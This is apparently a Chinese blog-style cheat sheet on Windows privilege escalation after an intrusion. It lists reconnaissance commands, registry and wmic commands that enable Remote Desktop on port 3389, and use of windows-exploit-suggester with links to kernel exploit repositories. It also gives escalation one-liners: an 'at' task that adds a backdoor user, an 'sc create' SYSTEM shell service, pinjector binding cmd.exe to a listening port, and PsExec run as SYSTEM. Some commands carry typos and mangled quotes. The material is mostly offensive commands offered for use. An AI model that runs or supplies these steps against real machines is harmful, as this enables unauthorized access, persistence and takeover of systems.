Windows提权 cmd 开启 3389
提权
- 1.操作系统的名称和版本信号
- 查看所有用户
- 查看远程端口(3389)
- 查看网络配置情况
- 目录文件操作: 常用命令
- 开启3389端口
- Windows 提权准备
- 提权辅助工具
- 提权辅助网站
- 低版本at提权 windows server 2003
- Sc提权:
- 利用 pinjector.exe 提权
- PSTools提权
1.操作系统的名称和版本信号
Systeminfo | findstr /B /C:”OS Name” /C:”OS Version”
Systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本”
修补程序 补丁
主机名称:hostname 命令
环境变量:set 命令
whoami
查看所有用户
查看所有用户:”net user” 或者” net1 user”命令
查看管理员用户组:”net localgroup administrators”或者
“net1 localgroup administrators”命令
查看远程终端在线用户:”query user”或者”quser”命令
查看远程端口(3389)
1.获取对应的pid号:”tasklist /svc|find “TermService”命令
2.通过PID号查询端口:”netstat –ano | findstr 1980”命令
netstat -ano
term Service
terminal 终端
tasklist /svc|findstr 3876
查看网络配置情况
网络配置情况:”ipconfig /all” 命令
路由器信息:”route Print”命令
查看arp缓存:”arp –a”命令
查看网络连接:”netstat –ano”命令
查看防火墙规则:
Netsh firewall show config
路由器信息:”route Print”命令
查看arp缓存:”arp –a”命令
查看防火墙规则:
Netsh firewall show config
目录文件操作: 常用命令
列出c:\phpstudy下的所有目录
For /d %i in (c:\phpstudy*) do @echo %i
以当前目录为搜索路径,把当前目录及子目录中的全部exe文件列出:
For /r %i in (*.exe) do @echo %i
以指定目录为搜索目录,把当前目录以及子目录中的所有文件列出:
For /r “目录名” %i in (.) do echo %i
通过使用/f命令,可以显示b.txt中的内容
For /f %i in (C:\1.txt) do echo %i
打印特定目录下的目录名 for /d %i in (xxxx/xxxx) do @echo %i
打印当前目录下的文件 for /r %i in (xxx.xxxx) do @echo %i
打印指定目录下的文件 for /r “xxx/xxxx” %i in (.) do @echo %i
for /d %i in (C:\phpStudy*) do @echo %i
For /r %i in (*.exe) do @echo %i 打印当前目录下 将所有的以.exe文件作为结尾的赋值给变量%i 然后打印
以指定目录为搜索目录,把当前目录以及子目录中的所有文件列出: For /r “目录名” %i in (.) do echo %i
通过使用/f命令,可以显示b.txt中的内容
For /f %i in (C:\1.txt) do echo %i
findstr
开启3389端口
在windows server 2003 中,使用cmd命令开启3389:
Wmic path win32_terminalservicesetting where (__CLASS != “”) call setallowtsconnections 1
在windows server 2012 中,使用cmd命令开启3389:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
关闭3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
开启3389端口
在windows server 2008/7/server 2012中,使用cmd开启3389端口
wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != “”) callsetallowtsconnections 1
在windows server 2012 和windows 7 中只需要执行前2条命令.
wind 10
reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server” /v fSingleSessionPerUser /t REG_DWORD /d 0
Windows 提权准备
1.信息收集
2.根据操作系统的具体情况来决定提权
提权辅助工具
Windows exploit-suggester是一款提权辅助工具.
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py # 下载安装脚本
sudo python2 get-pip.py # 运行安装脚本
pip2 install xlrd1.2.0
pip2 --trusted-host pypi.python.org install xlrd1.2.0(优先)
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database ./2022-04-18-mssb.xls --systeminfo ./systeminfo.txt
https://github.com/klsfct/getshell
https://github.com/SecWiki/windows-kernel-exploits
windows-内核-exploits/ MS14-002 /
提权辅助网站
https://i.hacking8.com/tiquan
低版本at提权 windows server 2003
at 19:33 net user roge 123456 / add
at 时间 /interactive cmd.exe 获得交互的高级权限cmd
Sc提权:
创建一个计划任务
windows server 2003 要求是管理员权限
sc create systemcmd binPath= “cmd /K start” type= own type= interact
sc start systemcmd
利用 pinjector.exe 提权
Pinjector
Pinjector –l 列出进程
Pinjector –p pid cmd.exe listen_port
PSTools提权
PsExec.exe /accepteula /s \127.0.0.1 cmd /c “whoami”
Windows提权 cmd 开启 3389相关推荐
- 张小白的渗透之路(十一)--windows提权详解
windows基础命令 systeminfo | findstr OS **#获取系统版本信息** hostname **#获取主机名称** whomai /priv **#显示当前用户的安全特权** ...
- 系统提权之:Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- hackmap-[windows权限提升(windows提权思路)]
hackmap-[windows权限提升{windows提权思路}] 1.前言 1.1.提权分类 水平权限提升(越权) 垂直权限提升 1.2 windows提权概述 2.windows基于WebShe ...
- Windows提权基本原理,各位表哥了解下!
Windows提权基本原理 没有多少人谈论在Windows下提权,是一件让人遗憾的事!我想,没有人这么做的理由有以下几点: 在渗透测试项目中,客户需要的验证就是一个低权限shell. 在演示环境,你经 ...
- 使用MSF进行提权(windows提权、linux提权、wesng使用)
文章目录 MSF Windows提权 反弹shell 提权 END推荐阅读 MSF Linux提权 反弹shell 补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位 ...
- 利用ms16-032提权并打开3389端口
利用ms16-032提权并打开3389端口 1.在VM中创建win 2003,在win2003上安装iis服务并开启服务 2.配置iis服务 3.上传源码及配置网站 给put文件设置权限,添加iis访 ...
- 高收益的笨办法:暴破在Windows提权中的应用
千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路,也是后渗透阶段成功的关键.windows 提权,我常 ...
- windows提权速查流程
windows提权速查流程 1.可利用漏洞信息收集 收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 然后查询e ...
- Windows提权流程及手法
Windows提权 一.信息收集 二.WinSystemHelper 三.Sherlock 四.MSF提权 五.参考链接 一.信息收集 收集本机systeminfo中补丁信息 在提权辅助平台 http ...
- Windows提权的几种姿势
想象这种画面:你拿到了一台机器上Meterpreter会话了,然后你准备运行 getsystem 命令进行提权,但如果提权没有成功,你就准备认输了吗?只有懦夫才会认输.但是你不是,对吗?你是一个勇者! ...
最新文章
- 创建emp表 oracle,Oracle中创建和管理表详解
- 可能是第二好的 Spring OAuth 2.0 文章,艿艿端午在家写了 3 天~
- 任意1-10中的4个数字,使用加减乘除计算得出24结果的可能组合(java版),很多人小时候都玩过...
- Page.LoadTemplate的使用
- fedora删除旧版本内核
- 7-6 统计素数并求和 (20分)_托福、SAT最新考试报告:中国学生托福平均分81分;...
- delete删除重复记录方法
- 你们公司的业务是部署在什么平台?
- PyBioMed:一个用于化学物质、蛋白质和DNA及其相互作用的各种分子表示的Python文库
- C++11线程的生命周期
- Uniapp实现实时音视频的基础美颜滤镜功能
- c语言键盘连续双击程序,“到处乱跑”的光标!简单的C语言程序: 在室友的计算机上尝试!...
- 静一静,做好人生的减法
- 鼠标图标怎么自定义_苹果ios14怎么自定义图标 图标位置自由排列换风格教程
- 基于51单片机的故障灯检测
- ExtCertPathValidatorException: Could not validate certificate: null
- VS2019生成DLL
- java 高德地图路线规划_高德地图api之路线规划
- 营销老炮儿征战史1:利乐大手笔开市场
- macos sierra_如何在macOS Sierra上使用APFS文件系统格式化驱动器
热门文章
- 故障恢复 stm32_77条STM32知识,千万不能错过!干货
- 单体 soa 微服务 区别_程序员必须要知道的SOA和微服务的区别
- linux crontab文件位置,linux crontab at 文件目录
- form请求导出表格_程序员:java导出Excel,附带依赖、后端代码和前端JS
- Angr安装与使用之使用篇(九)
- C语言学习记录_2019.02.08
- Vue中解决移动端点击300毫秒延迟的问题
- EM 算法求解高斯混合模型python实现
- 安装软件报:The installer has encountered an unexpected error installing this package....此类错误...
- ORACLE 正則表達式